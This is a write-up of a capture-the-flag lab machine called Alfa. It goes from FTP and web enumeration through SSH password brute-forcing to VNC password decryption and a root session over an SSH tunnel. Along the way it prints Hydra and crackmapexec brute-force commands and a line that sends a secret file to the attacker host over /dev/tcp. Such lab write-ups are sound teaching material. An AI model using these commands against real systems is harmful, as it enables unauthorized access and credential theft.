Alfa starts with enumeration on FTP to obtain a username and an image file which named after a pet. It continues with finding a hidden path to intranet chat support from robots.txt file . The chat conversation reveals sensitive information and it allows me to guess a user’s password for initial access. In the user’s home directory, there is a VNC password, and it can be used to log into the currently running VNC server as root.

Skills Learned

  • Generating password list
  • Brute-force FTP and SSH
  • VNC password decrypt
  • SSH tunneling

Tools

Reconnaissance

Nmap

An initial scan with nmap discovers four open ports: FTP on port 21, HTTP on port 80, SMB on port 139 and 445.

→ root@iamf «alfa» «192.168.2.103» 
$ nmap -sC -sV -oA nmap/10-initial-alfa 192.168.2.109 -v
# Nmap 7.80 scan initiated Thu Apr 22 02:41:12 2021 as: nmap -sC -sV -oA nmap/10-initial-alfa -v 192.168.2.109
Nmap scan report for 192.168.2.109
Host is up (0.00056s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Dec 17 13:02 thomas
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.2.103
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Alfa IT Solutions
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:9C:8A:46 (Oracle VirtualBox virtual NIC)
Service Info: Host: ALFA; OS: Unix

Host script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m16s, median: -2s
| nbstat: NetBIOS name: ALFA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ALFA<00>             Flags: <unique><active>
|   ALFA<03>             Flags: <unique><active>
|   ALFA<20>             Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: alfa
|   NetBIOS computer name: ALFA\x00
|   Domain name: \x00
|   FQDN: alfa
|_  System time: 2021-04-22T08:41:36+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-22T06:41:36
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 22 02:41:38 2021 -- 1 IP address (1 host up) scanned in 26.16 seconds

nmap identified anonymous access is allowed on FTP.

Performing a full port scan, discovers the fifth port.

→ root@iamf «alfa» «192.168.2.103» 
$ nmap -p- nmap/10-allports-alfa 192.168.2.109 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-22 02:53 EDT
Nmap scan report for 192.168.2.109
Host is up (0.00040s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
65111/tcp open  unknown
MAC Address: 08:00:27:9C:8A:46 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 36.32 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Poking port 65111 with nc reveals it’s SSH.

→ root@iamf «alfa» «192.168.2.103» 
$ nc 192.168.2.109 65111
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Enumeration

TCP 21 - FTP

Enumeration with on FTP discovers a potential username called thomas, an image file named milo.jpg.

→ root@iamf «alfa» «192.168.2.103» 
$ ftp 192.168.2.109 
Connected to 192.168.2.109.
220 (vsFTPd 3.0.3)
Name (192.168.2.109:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Dec 17 13:02 thomas
226 Directory send OK.
ftp> cd thomas
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          104068 Dec 17 12:49 milo.jpg

milo.jpg is a picture of a dog.

image-20210613181756997

TCP 445 - SMB

On SMB, anonymous access is allowed but no read permission there.

→ root@iamf «alfa» «192.168.2.103» 
$ crackmapexec smb 192.168.2.109 -u 'ANONYMOUS' -p '' --shares
SMB         192.168.2.109   445    ALFA             [*] Windows 6.1 (name:ALFA) (domain:) (signing:False) (SMBv1:True)
SMB         192.168.2.109   445    ALFA             [+] \ANONYMOUS: 
SMB         192.168.2.109   445    ALFA             [+] Enumerated shares
SMB         192.168.2.109   445    ALFA             Share           Permissions     Remark
SMB         192.168.2.109   445    ALFA             -----           -----------     ------
SMB         192.168.2.109   445    ALFA             print$                          Printer Drivers
SMB         192.168.2.109   445    ALFA             IPC$                            IPC Service (Samba 4.9.5-Debian)

TCP 80 - Web

Visiting port 80 shows a website titled with “Alfa IT Solutions”.

image-20210422143723577

Nothing useful on the page source.

Gobuster

gobuster scan discovers a robot.txt file

→ root@iamf «alfa» «192.168.2.103» 
$ gobuster dir -u http://192.168.2.109/ -x html,txt,bak -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -o gobuster/gobuster-L-80 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.109/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,bak
[+] Timeout:                 10s
===============================================================
2021/04/22 02:46:48 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 311] [--> http://192.168.2.109/js/]
/images               (Status: 301) [Size: 315] [--> http://192.168.2.109/images/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.2.109/css/]   
/index.html           (Status: 200) [Size: 3870]                                  
/fonts                (Status: 301) [Size: 314] [--> http://192.168.2.109/fonts/] 
/robots.txt           (Status: 200) [Size: 459]                                   
/server-status        (Status: 403) [Size: 278] 

robots.txt

Accessing robots.txt discovers some directories. But, these are just dummy.

image-20210422134810181

Poking the robots.txt file with curl discovers a string which looks like a brainfuck language.

→ root@iamf «alfa» «192.168.2.103» 
$ curl -s http://192.168.2.109/robots.txt
/home #404
/admin #404
/login #404
/images #200, directory listing, nothing interesting
/cgi-bin #404
/intranet #404
/wp-admin #404
/wp-login #404

...<SNIP>...
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.

Using this site, the string gets translated as /alfa-support .

image-20210613181246585

/alfa-support

On /alfa-support, there is a chat between Thomas as the employee and the IT support operator (I think?).

image-20210422143814423

From the conversation above, I’ll note that Thomas uses a password that consists of his(or her?) pet’s name followed by 3 numerical digits.

Foothold

Shell as Thomas

Creating Wordlist

From the previous FTP enumeration, ‘milo’ is most likely the name of Thomas’s pet. With bash, I could generate all the possible password used by Thomas.

→ root@iamf «alfa» «192.168.2.103» 
$ for i in {000..999}; do echo "milo$i"; done | tee passwords
milo000
milo001
milo002
milo003
...<snip>...

Brute force - FTP

I tried it with Hydra on FTP but returns nothing.

→ root@iamf «alfa» «192.168.2.103» 
$ hydra -l thomas -P passwords ftp://192.168.2.103 
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-22 03:43:09
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ftp://192.168.2.103:21/
[STATUS] 320.00 tries/min, 320 tries in 00:01h, 713 to do in 00:03h, 16 active
[STATUS] 317.00 tries/min, 634 tries in 00:02h, 399 to do in 00:02h, 16 active
[STATUS] 315.67 tries/min, 947 tries in 00:03h, 86 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid passwords found
[WARNING] Writing restore file because 15 final worker threads did not complete until end.
[ERROR] 15 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-22 03:46:35

Brute force - SSH

This time I will use crackmapexec , and I will divide the wordlist into two files

  • passwords1: 000-500
  • passwords2: 500-999
→ root@iamf «alfa» «192.168.2.103» 
$ crackmapexec ssh 192.168.2.109 -u thomas -p passwords2 --port 65111

After some minutes it returns one valid combination: thomas:milo666

image-20210422151432013

SSH - Thomas

I’ll just log in via SSH and grabs the flag.

→ root@iamf «alfa» «192.168.2.103» 
$ ssh -p 65111 thomas@192.168.2.109
thomas@192.168.2.109's password: 
Linux Alfa 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

####################################################################
#                  ,---------------------------,                   #
#                  |  /---------------------\  |                   #
#                  | |                       | |                   #
#                  | |         +----+        | |                   #
#                  | |         |ALFA|        | |                   #
#                  | |         +----+        | |                   #
#                  | |                       | |                   #
#                  |  \_____________________/  |                   #
#                  |___________________________|                   #
#                ,---\_____     []     _______/------,             #
#              /         /______________\           /|             #
#            /___________________________________ /  | ___         #
#            |                                   |   |    )        #
#            |  _ _ _                 [-------]  |   |   (         #
#            |  o o o                 [-------]  |  /    _)_       #
#            |__________________________________ |/     /  /       #
#        /-------------------------------------/|      ( )/        #
#      /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /                   #
#    /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /                     #
#     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                       #
#  ██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗  #
#  ██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝  #
#  ██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗    #
#  ██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝    #
#  ╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗  #
#   ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝  #
####################################################################

thomas@Alfa:~$ id
uid=1000(thomas) gid=1000(thomas) grupos=1000(thomas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
thomas@Alfa:~$ ls -l
total 4
-rw-r--r-- 1 thomas thomas 1332 dic 20 11:04 user.txt

Privilege Escalation

Shell as root

Internal enumeration

In thomas’s home directory, there is a file called .remote-secret and it is owned by root but world-writable.

thomas@Alfa:~$ ls -la
total 40
drwxr-xr-x 4 thomas thomas 4096 dic 20 22:22 .
drwxr-xr-x 3 root   root   4096 dic 16 07:58 ..
-rw------- 1 thomas thomas    4 dic 20 22:22 .bash_history
-rw-r--r-- 1 thomas thomas  220 dic 16 07:58 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 dic 16 07:58 .bashrc
drwx------ 3 thomas thomas 4096 dic 16 21:15 .gnupg
drwxr-xr-x 3 thomas thomas 4096 dic 16 20:44 .local
-rw-r--r-- 1 thomas thomas  807 dic 16 07:58 .profile
-rwxrwxrwx 1 root   root     16 dic 17 23:35 .remote_secret
-rw-r--r-- 1 thomas thomas 1332 dic 20 11:04 user.txt

At first, I assumed it was some kind of service hijacking, but the file contents appeared to be encrypted.

thomas@Alfa:~$ cat .remote_secret 
"�Cc�"�Cc

Running pspy discovers a VNC server running locally with root access on port 5901.

2021/04/22 10:47:57 CMD: UID=0    PID=404    | /usr/bin/Xtigervnc :1 -desktop Alfa:1 (root) -auth /root/.Xauthority -geometry 1900x1200 -depth 24 -rfbwait 30000 -rfbauth /root/.vnc/passwd -rfbport 5901 -pn -localhost -SecurityTypes VncAuth    

VNC Decrypt

This .remote_secret is a VNC password file and I could use vncpwd to decrypt it (I’ve also done this previously on HTB: Cascade). I’ll transfer the file to my attacking machine and decrypt it there.

On Alfa:

thomas@Alfa:~$ cat .remote_secret > /dev/tcp/192.168.2.103/9000

On my Kali:

→ root@iamf «alfa» «192.168.2.103» 
$ nc -nvlp 9000 > remote_secret
listening on [any] 9000 ...
connect to [192.168.2.103] from (UNKNOWN) [192.168.2.109] 57532

The file content is decrypted to k!LL3rSs.

→ root@iamf «alfa» «192.168.2.103» 
$ ./vncpwd remote_secret 
Password: k!LL3rSs

I tried the password on root, but it didn’t work. The next option here is to access the VNC server using this password.

Accessing VNC

Since the VNC server is not accessible from outside, I’ll need a port forwarding to interact with it.

On thomas’s session

thomas@Alfa:~$ ~C
ssh> -L 5901:localhost:5901 
Forwarding port.

That will create a tunnel from my Kali localhost:5901 => Alfa’s localhost:5901

Now I can try to connect to the VNC server using vncviewer (it’s preinstalled on Kali) and supply the remote_secret file to -password option.

→ root@iamf «alfa» «192.168.2.103»  
$ vncviewer -passwd remote_secret 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "Alfa:1 (root)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

It opens this Windows, and I’m already on root.

image-20210422160633799

To be honest, this is actually guessing.

At first I doubt that this remote_secret is shared with root user, but that’s how I pwned this machine.

Reference